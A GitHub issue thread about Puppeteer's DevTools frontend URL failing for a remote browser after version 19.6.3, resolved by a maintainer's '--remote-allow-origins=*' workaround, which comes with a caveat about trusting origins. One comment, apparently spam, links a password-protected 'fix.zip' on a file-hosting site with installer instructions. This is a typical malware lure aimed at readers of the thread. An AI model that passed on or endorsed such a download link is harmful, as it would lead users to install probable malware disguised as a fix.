### ISSUE TITLE
[Bug]: after puppeteer version 19.6.3 can't access devtoolsFrontendUrl.

### ISSUE THREAD

**Issue by Dineshkumar197** [puppeteer/puppeteer#13001] opened 2024-08-26 14:37 UTC
### Minimal, reproducible example

```TypeScript
const puppeteer = require('puppeteer');


(async () => {
  var browser = await puppeteer.launch({ args:["--remote-debugging-port=9225"]});
})();
```

### Background

I launched a browser in remote machine with remote debugging enabled, and tried to access the page in local using devtoolsfrontendurl.got the  devtoolsfrontendurl  from http://<remote-ip>:<port>

### Expectation

I want to interact with the  pages in the remote browser using devtoolsfrontendurl.

### Reality

when I use puppeteer versions higher than 19.6.3 , I can't access the devtoolsfrontendurl, and it shows 'debugging connection was closed, websocket disconnected, reconnect when ready by reopening devtools'

<img width="1507" alt="Screenshot 2024-08-25 at 1 59 28 PM" src="https://github.com/user-attachments/assets/6a30c3c9-afe6-4af6-aa58-f2ad2aeaebc4">

### Puppeteer version

19.7.0

### Node version

20.6.1

### Package manager

npm

### Package manager version

7.24.2

### Operating system

macOS

**Comment by luozhengdong** [comment] 2024-08-26 14:37
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OrKoN** [comment] 2024-08-26 14:54
Duplicate of https://github.com/puppeteer/puppeteer/issues/12992 It could be related to the `--remote-allow-origins` being required to allow WebSocket connections from pages, e.g., crbug.com/40896897. In any case, it is not directly related to Puppeteer so consider opening an issue in Chromium > DevTools bug tracker.

**Closed as not planned by OrKoN** 2024-08-26 14:54 UTC

**Comment by OrKoN** [comment] 2024-08-26 16:53
As a workaround, allowing all origins could work:

```
const puppeteer = require('puppeteer');
(async () => {
  var browser = await puppeteer.launch({ args:["--remote-debugging-port=9225", "--remote-allow-origins=*"]});
})();
```

but generally, you should only allow origins you can trust.

**Comment by Dineshkumar197** [comment] 2024-08-27 10:15
> As a workaround, allowing all origins could work:
> 
> ```
> const puppeteer = require('puppeteer');
> (async () => {
>   var browser = await puppeteer.launch({ args:["--remote-debugging-port=9225", "--remote-allow-origins=*"]});
> })();
> ```
> 
> but generally, you should only allow origins you can trust.

it worked thanks.
